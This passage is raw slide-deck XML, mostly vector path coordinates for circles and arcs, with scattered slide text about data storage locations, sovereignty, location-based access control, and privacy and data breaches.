                  <a:lnTo>
                    <a:pt x="3010" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6641" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11689" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18153" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26034" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35332" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46046" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58176" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71723" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86686" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103064" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120859" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140070" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160696" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182739" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206196" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231070" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257358" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285062" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="76200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263640" y="4759451"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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6552056" y="4946650"/>
            <a:ext cx="1847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0" b="1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57425" y="4643144"/>
            <a:ext cx="3827779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9385" marR="5080" indent="-146685">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Selecting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st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ge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oca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ti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ns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to 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mitigate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sovereignty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issues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501630" y="4632096"/>
            <a:ext cx="3168650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0005" marR="5080" indent="-27940">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Defi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7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acces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cont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ols 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based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dirty="0" sz="2200" spc="-14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client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location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61859" y="4250435"/>
            <a:ext cx="1776983" cy="1778508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96103" y="306451"/>
            <a:ext cx="646049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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaches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1984" y="760476"/>
            <a:ext cx="8964167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75510" y="5466715"/>
            <a:ext cx="1927860" cy="694055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36830" marR="5080" indent="-24765">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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gan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za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ti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nal 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consequences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8419" y="4204245"/>
            <a:ext cx="3159760" cy="3211195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="298856" y="767295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259486" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1582407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259486" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="767295"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="1303172" y="2915374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1255991" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209484" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163688" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118641" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074356" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030884" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988250" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946480" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905624" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865695" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826731" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788771" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751852" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715987" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681228" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647598" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615124" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583844" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553796" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525005" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497509" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471335" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446519" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423087" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401091" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380530" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361467" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343928" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327926" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313524" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300723" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253301" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265798" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279908" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295630" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312902" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331711" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352018" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373786" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397002" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421614" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447611" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474941" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503580" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533501" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564680" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597065" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630631" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665353" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701192" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738136" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776122" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="815149" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855167" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896150" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938060" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="980871" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024559" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069086" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114412" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160513" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207363" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254925" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="2915374"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="1303172" y="247357"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1254925" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207363" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160513" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114412" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069086" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024559" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="980871" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938060" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896150" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855167" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="815149" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776122" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738136" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701192" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665353" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630631" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597065" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564680" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533501" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503580" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474941" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447611" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421614" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397002" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373786" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352018" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331711" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312902" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295630" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279908" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265798" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253301" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300723" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313524" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327926" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343928" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361467" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380530" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401091" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423087" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446519" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471335" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497509" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525005" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553796" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583844" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615124" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647598" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681228" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715987" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751852" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788771" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826731" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865695" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905624" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946480" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988250" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030884" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074356" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118641" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163688" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209484" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255991" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="247357"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2406929" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364752" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321953" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278557" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234603" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2190115" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2145157" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099741" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053920" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007717" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1961184" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914347" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867255" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819935" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772437" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724787" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677009" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629168" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="3153054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533423" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485582" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437805" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390154" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342656" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295336" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248244" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201407" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154874" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108671" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062850" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017435" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972477" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927989" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884034" y="2983065"/>
                </a:lnTo>
